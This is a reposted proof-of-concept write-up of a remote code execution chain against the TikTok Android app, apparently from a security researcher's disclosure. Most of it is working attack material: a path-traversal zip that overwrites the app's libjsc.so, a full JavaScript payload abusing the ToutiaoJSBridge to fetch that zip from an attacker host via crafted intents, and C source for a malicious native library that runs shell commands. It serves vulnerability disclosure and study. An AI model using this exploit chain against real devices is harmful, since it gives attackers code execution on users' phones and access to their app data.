# 安卓版TikTok RCE漏洞/en
Created a zip file with a path that traverses the file name and overwrites the
/data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so
dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21 p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64) Scanning the drive for archives: 1 file, 1930 bytes (2 KiB) Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip -- Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip Type = zip Physical Size = 1930 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2020-11-26 04:08:29 ..... 5896 1496 ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so ------------------- ----- ------------ ------------ ------------------------ 2020-11-26 04:08:29 5896 1496 1 files
Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.
==POC==
document.title = "Loading.."; document.write("Loading..
"); if (document && window.name != "finished") { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time. window.name = "finished"; window.ToutiaoJSBridge.invokeMethod(JSON.stringify({ "__callback_id": "0", "func": "preloadMiniApp", "__msg_type": "callback", "params": { "mini_app_url": "https://microapp/" }, "JSSDK": "1", "namespace": "host", "__iframe_url": "http://d.c/" })); // initialize Mini App window.ToutiaoJSBridge.invokeMethod(JSON.stringify({ "__callback_id": "0", "func": "openSchema", "__msg_type": "callback", "params": { "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&noRedirect=false&title=First%20Stage&disable_app_link=false" }, "JSSDK": "1", "namespace": "host", "__iframe_url": "http://iframe.attacker.com/" })); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so setTimeout(function() { window.ToutiaoJSBridge.invokeMethod(JSON.stringify({ "__callback_id": "0", "func": "openSchema", "__msg_type": "callback", "params": { "schema": "aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&noRedirect=false&title=Second%20Stage&disable_app_link=false" }, "JSSDK": "1", "namespace": "host", "__iframe_url": "http://iframe.attacker.com/" })); // load the malicious library after overwrtting it. }, 5000); }
Malicious library code:
#include#include #include JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) { system("id > /data/data/com.zhiliaoapp.musically/PoC"); return JNI_VERSION_1_6; }
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容